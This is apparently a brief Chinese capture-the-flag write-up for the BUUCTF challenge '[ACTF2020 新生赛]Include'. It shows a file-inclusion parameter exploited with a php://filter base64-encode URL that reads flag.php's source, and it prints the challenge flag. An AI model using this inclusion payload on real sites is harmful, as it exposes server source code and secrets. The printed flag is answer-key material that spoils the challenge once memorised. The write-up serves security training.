[ACTF2020 新生赛]Include

1.访问页面,存在一个链接。
[ACTF2020 新生赛]Include_第1张图片
2.点击之后,路径存在文件包含,URL/?file=flag.php
[ACTF2020 新生赛]Include_第2张图片

3.使用PHP伪协议,访问解码即可。

http://ad7864db-ad11-4c5c-ad80-d2ba20465029.node5.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

flag{c4ee6b11-9726-4ae2-9523-4128719151b4}

[ACTF2020 新生赛]Include_第3张图片

你可能感兴趣的:(BUUCTF,安全,web安全,安全性测试)